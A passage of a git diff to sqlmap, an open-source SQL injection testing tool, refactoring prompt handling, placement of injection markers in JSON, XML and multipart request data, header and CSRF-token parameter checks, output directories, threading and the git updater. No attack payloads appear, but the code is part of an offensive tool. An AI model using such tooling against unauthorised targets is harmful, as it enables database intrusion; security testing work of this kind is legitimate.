None and CUSTOM_INJECTION_MARK_CHAR in conf.data: message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR message += "'--data'. Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y') + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' if kb.processUserMarks: kb.testOnlyCustom = True - if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): - if re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + if re.search(JSON_RECOGNITION_REGEX, conf.data): + message = "JSON data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y') + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data) @@ -143,52 +149,68 @@ def _setRequestParams(): _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _) _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _) conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) - kb.postHint = POST_HINT.JSON - elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): - message = "JSON-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.JSON + + elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): + message = "JSON-like data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"('(?P[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data) conf.data = re.sub(r"('(?P[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.JSON_LIKE - elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): - message = "Array-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.JSON_LIKE + + elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): + message = "Array-like data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data) - kb.postHint = POST_HINT.ARRAY_LIKE - elif re.search(XML_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.ARRAY_LIKE + + elif re.search(XML_RECOGNITION_REGEX, conf.data): + message = "SOAP/XML data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML - elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML + + elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): + message = "Multipart-like data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.MULTIPART + + kb.postHint = POST_HINT.MULTIPART if not kb.postHint: if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed @@ -210,20 +232,20 @@ def _setRequestParams(): if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"): warnMsg = "you've provided target URL without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " + warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" + warnMsg += "through option '--data'" logger.warn(warnMsg) message = "do you want to try URI injections " message += "in the target URL itself? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] not in ("n", "N"): + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) kb.processUserMarks = True - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" @@ -232,11 +254,12 @@ def _setRequestParams(): lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' if kb.processUserMarks: kb.testOnlyCustom = True @@ -315,39 +338,46 @@ def _setRequestParams(): # Perform checks on header values if conf.httpHeaders: - for httpHeader, headerValue in conf.httpHeaders: + for httpHeader, headerValue in list(conf.httpHeaders): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - httpHeader = httpHeader.title() - - if httpHeader == HTTP_HEADER.USER_AGENT: + if httpHeader.title() == HTTP_HEADER.USER_AGENT: conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) if condition: conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} testableParameters = True - elif httpHeader == HTTP_HEADER.REFERER: + elif httpHeader.title() == HTTP_HEADER.REFERER: conf.parameters[PLACE.REFERER] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) if condition: conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader == HTTP_HEADER.HOST: + elif httpHeader.title() == HTTP_HEADER.HOST: conf.parameters[PLACE.HOST] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) if condition: conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} testableParameters = True + else: + condition = intersect(conf.testParameter, [httpHeader], True) + + if condition: + conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) + conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)} + conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders] + testableParameters = True + if not conf.parameters: errMsg = "you did not provide any GET, POST and Cookie " errMsg += "parameter, neither an User-Agent, Referer or Host header value" @@ -359,7 +389,7 @@ def _setRequestParams(): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) @@ -369,9 +399,9 @@ def _setRequestParams(): if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter) message += "Do you want sqlmap to automatically update it in further requests? [y/N] " - test = readInput(message, default="N") - if test and test[0] in ("y", "Y"): - conf.csrfToken = parameter + + if readInput(message, default='N', boolean=True): + conf.csrfToken = getUnicode(parameter) break def _setHashDB(): @@ -399,12 +429,18 @@ def _resumeHashDBValues(): """ kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns + kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars + kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable + kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) + if kb.errorChunkLength and kb.errorChunkLength.isdigit(): + kb.errorChunkLength = int(kb.errorChunkLength) + else: + kb.errorChunkLength = None + conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: @@ -413,7 +449,7 @@ def _resumeHashDBValues(): if not conf.tech or intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) + injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) if injection not in kb.injections: kb.injections.append(injection) @@ -434,7 +470,7 @@ def _resumeDBMS(): dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("%s ([\d\.]+)" % _, dbms, re.I) + _ = re.search(r"\A%s (.*)" % _, dbms, re.I) if _: dbms = _.group(1).lower() @@ -453,9 +489,8 @@ def _resumeDBMS(): message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms message += "Do you really want to force the back-end " message += "DBMS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.dbms = None Backend.setDbms(dbms) Backend.setVersionList(dbmsVersion) @@ -489,9 +524,8 @@ def _resumeOS(): message += "operating system is %s. " % os message += "Do you really want to force the back-end DBMS " message += "OS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.os = os else: conf.os = os @@ -514,7 +548,8 @@ def _setResultsFile(): except (OSError, IOError), ex: try: warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex)) - conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1] + handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv") + os.close(handle) conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename logger.warn(warnMsg) @@ -525,7 +560,7 @@ def _setResultsFile(): errMsg += "create temporary files and/or directories" raise SqlmapSystemException(errMsg) - conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep) + conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep) logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) @@ -574,11 +609,7 @@ def _createDumpDir(): conf.dumpPath = tempDir def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper - + conf.dumper = dumper conf.dumper.setOutputFile() def _createTargetDirs(): @@ -586,28 +617,33 @@ def _createTargetDirs(): Create the output directory. """ - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) + try: + if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): + os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) + + _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr()) + open(_, "w+b").close() + os.remove(_) + + if conf.outputDir: warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + except (OSError, IOError), ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") + except Exception, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - warnMsg = "unable to create regular output directory " - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the") + warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warn(warnMsg) - paths.SQLMAP_OUTPUT_PATH = tempDir + paths.SQLMAP_OUTPUT_PATH = tempDir conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) @@ -635,6 +671,7 @@ def _createTargetDirs(): with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) + f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) if conf.data: f.write("\n\n%s" % getUnicode(conf.data)) except IOError, ex: @@ -642,7 +679,7 @@ def _createTargetDirs(): errMsg = "you don't have enough permissions " else: errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, ex) + errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) raise SqlmapMissingPrivileges(errMsg) @@ -683,10 +720,13 @@ def initTargetEnv(): class _(unicode): pass + kb.postUrlEncode = True + for key, value in conf.httpHeaders: if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): kb.postUrlEncode = "urlencoded" in value break + if kb.postUrlEncode: original = conf.data conf.data = _(urldecode(conf.data)) diff --git a/lib/core/testing.py b/lib/core/testing.py index 8339cbc32..23dd751ac 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -25,6 +25,7 @@ from lib.core.common import readXmlFile from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapNotVulnerableException from lib.core.log import LOGGER_HANDLER @@ -40,6 +41,8 @@ class Failures(object): failedParseOn = None failedTraceBack = None +_failures = Failures() + def smokeTest(): """ Runs the basic smoke testing of a program @@ -52,16 +55,17 @@ def smokeTest(): if any(_ in root for _ in ("thirdparty", "extra")): continue - for ifile in files: - length += 1 + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: @@ -70,7 +74,7 @@ def smokeTest(): except Exception, msg: retVal = False dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg) logger.error(errMsg) else: # Run doc tests @@ -79,9 +83,9 @@ def smokeTest(): if failure_count > 0: retVal = False - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: @@ -191,11 +195,11 @@ def liveTest(): else: errMsg = "test failed" - if Failures.failedItems: - errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems) + if _failures.failedItems: + errMsg += " at parsing items: %s" % ", ".join(i for i in _failures.failedItems) errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH - errMsg += " - traceback: %s" % bool(Failures.failedTraceBack) + errMsg += " - traceback: %s" % bool(_failures.failedTraceBack) if not vulnerable: errMsg += " - SQL injection not detected" @@ -203,14 +207,14 @@ def liveTest(): logger.error(errMsg) test_case_fd.write("%s\n" % errMsg) - if Failures.failedParseOn: + if _failures.failedParseOn: console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - console_output_fd.write(Failures.failedParseOn) + console_output_fd.write(_failures.failedParseOn) console_output_fd.close() - if Failures.failedTraceBack: + if _failures.failedTraceBack: traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(Failures.failedTraceBack) + traceback_fd.write(_failures.failedTraceBack) traceback_fd.close() beep() @@ -231,11 +235,11 @@ def liveTest(): return retVal def initCase(switches, count): - Failures.failedItems = [] - Failures.failedParseOn = None - Failures.failedTraceBack = None + _failures.failedItems = [] + _failures.failedParseOn = None + _failures.failedTraceBack = None - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count) + paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count)) paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") @@ -277,10 +281,10 @@ def runCase(parse): LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ if unhandled_exception: - Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) + _failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) retVal = None elif handled_exception: - Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) + _failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) retVal = None elif result is False: # this means no SQL injection has been detected - if None, ignore retVal = False @@ -297,17 +301,17 @@ def runCase(parse): if item.startswith("r'") and item.endswith("'"): if not re.search(item[2:-1], parse_on, re.DOTALL): retVal = None - Failures.failedItems.append(item) + _failures.failedItems.append(item) elif item not in parse_on: retVal = None - Failures.failedItems.append(item) + _failures.failedItems.append(item) - if Failures.failedItems: - Failures.failedParseOn = console + if _failures.failedItems: + _failures.failedParseOn = console elif retVal is False: - Failures.failedParseOn = console + _failures.failedParseOn = console return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py index 8647ecfd0..b3566b955 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,17 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import difflib +import random import threading import time import traceback -from thread import error as threadError - from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -19,6 +18,7 @@ from lib.core.datatype import AttribDict from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapValueException from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import PYVERSION @@ -38,22 +38,30 @@ class _ThreadData(threading.local): Resets thread data model """ + self.requestCollector = None + self.disableStdOut = False self.hashDBCursor = None self.inTransaction = False + self.lastCode = None self.lastComparisonPage = None self.lastComparisonHeaders = None + self.lastComparisonCode = None + self.lastComparisonRatio = None self.lastErrorPage = None self.lastHTTPError = None self.lastRedirectMsg = None self.lastQueryDuration = 0 + self.lastPage = None self.lastRequestMsg = None self.lastRequestUID = 0 self.lastRedirectURL = None + self.random = random.WichmannHill() self.resumed = False self.retriesCount = 0 self.seqMatcher = difflib.SequenceMatcher(None) self.shared = shared + self.validationRun = 0 self.valueStack = [] ThreadData = _ThreadData() @@ -61,7 +69,7 @@ ThreadData = _ThreadData() def getCurrentThreadUID(): return hash(threading.currentThread()) -def readInput(message, default=None): +def readInput(message, default=None, checkBatch=True, boolean=False): # It will be overwritten by original from lib.core.common pass @@ -81,16 +89,16 @@ def getCurrentThreadName(): return threading.current_thread().getName() -def exceptionHandledFunction(threadFunction): +def exceptionHandledFunction(threadFunction, silent=False): try: threadFunction() except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True raise - except Exception, errMsg: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + except Exception, ex: + if not silent: + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) def setDaemon(thread): # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation @@ -144,8 +152,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio try: thread.start() - except threadError, errMsg: - errMsg = "error occurred while starting new thread ('%s')" % errMsg + except Exception, ex: + errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break @@ -160,13 +168,13 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio alive = True time.sleep(0.1) - except KeyboardInterrupt: + except (KeyboardInterrupt, SqlmapUserQuitException), ex: print kb.threadContinue = False kb.threadException = True if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") + logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: while (threading.activeCount() > 1): pass @@ -177,10 +185,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio if forwardException: raise - except (SqlmapConnectionException, SqlmapValueException), errMsg: + except (SqlmapConnectionException, SqlmapValueException), ex: print kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) except: from lib.core.common import unhandledExceptionMessage @@ -198,8 +206,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio kb.threadException = False for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() + if lock.locked(): + try: + lock.release() + except: + pass if conf.get("hashDB"): conf.hashDB.flush(True) diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index 205b77a94..f83ee895c 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/update.py b/lib/core/update.py index f2a8de322..279467687 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -1,18 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import locale import os import re +import subprocess import time -from subprocess import PIPE -from subprocess import Popen as execute - from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import pollProcess from lib.core.data import conf from lib.core.data import logger @@ -26,11 +26,10 @@ def update(): return success = False - rootDir = paths.SQLMAP_ROOT_PATH - if not os.path.exists(os.path.join(rootDir, ".git")): + if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" + errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development version from the " @@ -41,17 +40,25 @@ def update(): logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode + + try: + process = subprocess.Popen("git 